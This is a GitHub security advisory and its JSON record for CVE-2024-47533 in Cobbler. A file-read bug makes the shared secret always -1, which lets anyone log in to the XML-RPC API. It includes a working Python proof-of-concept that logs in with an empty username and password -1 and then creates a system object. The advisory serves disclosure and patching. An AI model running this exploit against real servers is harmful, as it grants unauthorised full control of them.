ghsa-m26c-fcgh-cp6h
Vulnerability from github
Published: 2024-11-18 20:00
Modified: 2024-11-18 20:00
Severity ?
Summary
cobbler allows anyone to connect to cobbler XML-RPC server with known password and make changes
Details

Summary

`utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to the cobbler XML-RPC server as user `''` with password `-1` and make any changes.

Details

utils.py get_shared_secret:

```
def get_shared_secret() -> Union[str, int]:
    """
    The 'web.ss' file is regenerated each time cobblerd restarts and is used to agree on shared secret interchange
    between the web server and cobblerd, and also the CLI and cobblerd, when username/password access is not required.
    For the CLI, this enables root users to avoid entering username/pass if on the Cobbler server.

    :return: The Cobbler secret which enables full access to Cobbler.
    """

    try:
        with open("/var/lib/cobbler/web.ss", 'rb', encoding='utf-8') as fd:
            data = fd.read()
    except:
        return -1
    return str(data).strip()
```

Always returns `-1` because of the following exception:

```
binary mode doesn't take an encoding argument
```

This appears to have been introduced by commit 32c5cada013dc8daa7320a8eda9932c2814742b0 and so affects versions 3.0.0+.
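The failure mode described above, next to a fail-closed variant, as an added example that is not Cobbler's code or its actual fix. The `path` parameter, `get_shared_secret_hardened`, `direct_login_ok` (a stand-in for the empty-username login comparison) and the sample secret are assumptions made for illustration.

```python
import hmac
import os
import tempfile
from typing import Union


def get_shared_secret_vulnerable(path: str) -> Union[str, int]:
    """Logic of the advisory's excerpt, with the file path as a parameter."""
    try:
        # Raises ValueError: binary mode doesn't take an encoding argument.
        with open(path, "rb", encoding="utf-8") as fd:
            data = fd.read()
    except:  # bare except hides the ValueError, so the sentinel is returned
        return -1
    return str(data).strip()


def get_shared_secret_hardened(path: str) -> str:
    """Fail closed: a read problem raises instead of yielding a sentinel."""
    with open(path, "r", encoding="utf-8") as fd:
        secret = fd.read().strip()
    if not secret:
        raise ValueError("shared secret file is empty")
    return secret


def direct_login_ok(shared_secret: object, password: object) -> bool:
    """Hypothetical empty-username check: only two strings can match."""
    if not isinstance(shared_secret, str) or not isinstance(password, str):
        return False
    return hmac.compare_digest(shared_secret.encode(), password.encode())


def demo() -> dict:
    # Constructed secret file standing in for /var/lib/cobbler/web.ss.
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "web.ss")
        with open(path, "w", encoding="utf-8") as fd:
            fd.write("constructed-sample-secret\n")
        vulnerable = get_shared_secret_vulnerable(path)
        hardened = get_shared_secret_hardened(path)
    return {
        "vulnerable": vulnerable,
        "sentinel_equals_minus_one": vulnerable == -1,
        "hardened": hardened,
        "checked_accepts_minus_one": direct_login_ok(hardened, -1),
        "checked_accepts_secret": direct_login_ok(hardened, hardened),
    }
```

Even with a valid secret file present, the vulnerable reader yields the predictable sentinel `-1`; the hardened reader raises on a missing or empty file, and the type-checked comparison rejects any non-string credential.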

PoC

```
#!/usr/bin/python3

import ssl
import xmlrpc.client

params = { 'proto': 'https', 'host': 'COBBLER_SERVER', 'port': '443', 'username': '', 'password': -1 }
ssl_context = ssl._create_unverified_context()

url = '{proto}://{host}:{port}/cobbler_api'.format(**params)
if ssl_context:
    conn = xmlrpc.client.ServerProxy(url, context=ssl_context)
else:
    conn = xmlrpc.client.Server(url)

try:
    token = conn.login(params['username'], params['password'])
except xmlrpc.client.Fault as e:
    print("Failed to log in to Cobbler '{url}' as '{username}'. {error}".format(url=url, error=e, **params))
except Exception as e:
    print("Connection to '{url}' failed. {error}".format(url=url, error=e, **params))

print("Login success!")

system_id = conn.new_system(token)
```

Impact

This gives anyone with network access to a cobbler server full control of the server.



{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "cobbler"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.3.0"
            },
            {
              "fixed": "3.3.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "cobbler"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.2.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-47533"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-18T20:00:56Z",
    "nvd_published_at": "2024-11-18T17:15:11Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nutils.get_shared_secret() always returns -1 - allows anyone to connect to cobbler XML-RPC as user \u0027\u0027 password -1 and make any changes.\n\n### Details\nutils.py get_shared_secret:\n```\ndef get_shared_secret() -\u003e Union[str, int]:\n    \"\"\"\n    The \u0027web.ss\u0027 file is regenerated each time cobblerd restarts and is used to agree on shared secret interchange\n    between the web server and cobblerd, and also the CLI and cobblerd, when username/password access is not required.\n    For the CLI, this enables root users to avoid entering username/pass if on the Cobbler server.\n\n    :return: The Cobbler secret which enables full access to Cobbler.\n    \"\"\"\n\n    try:\n        with open(\"/var/lib/cobbler/web.ss\", \u0027rb\u0027, encoding=\u0027utf-8\u0027) as fd:\n            data = fd.read()\n    except:\n        return -1\n    return str(data).strip()\n```\nAlways returns `-1` because of the following exception:\n```\nbinary mode doesn\u0027t take an encoding argument\n```\n\nThis appears to have been introduced by commit 32c5cada013dc8daa7320a8eda9932c2814742b0 and so affects versions 3.0.0+.\n\n### PoC\n```\n#!/usr/bin/python3\n\nimport ssl\nimport xmlrpc.client\n\nparams = { \u0027proto\u0027: \u0027https\u0027, \u0027host\u0027: \u0027COBBLER_SERVER\u0027, \u0027port\u0027: \u0027443\u0027, \u0027username\u0027: \u0027\u0027, \u0027password\u0027: -1 }\nssl_context = ssl._create_unverified_context()\n\nurl = \u0027{proto}://{host}:{port}/cobbler_api\u0027.format(**params)\nif ssl_context:\n    conn = xmlrpc.client.ServerProxy(url, context=ssl_context)\nelse:\n    conn = xmlrpc.client.Server(url)\n\ntry:\n    token = conn.login(params[\u0027username\u0027], params[\u0027password\u0027])\nexcept xmlrpc.client.Fault as e:\n    print(\"Failed to log in to Cobbler \u0027{url}\u0027 as \u0027{username}\u0027. {error}\".format(url=url, error=e, **params))\nexcept Exception as e:\n    print(\"Connection to \u0027{url}\u0027 failed. {error}\".format(url=url, error=e, **params))\n\nprint(\"Login success!\")\n\nsystem_id = conn.new_system(token)\n```\n\n\n### Impact\nThis gives anyone with network access to a cobbler server full control of the server.\n",
  "id": "GHSA-m26c-fcgh-cp6h",
  "modified": "2024-11-18T20:00:56Z",
  "published": "2024-11-18T20:00:56Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/cobbler/cobbler/security/advisories/GHSA-m26c-fcgh-cp6h"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47533"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cobbler/cobbler/commit/32c5cada013dc8daa7320a8eda9932c2814742b0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cobbler/cobbler/commit/e19717623c10b29e7466ed4ab23515a94beb2dda"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/cobbler/cobbler"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "cobbler allows anyone to connect to cobbler XML-RPC server with known password and make changes"
}

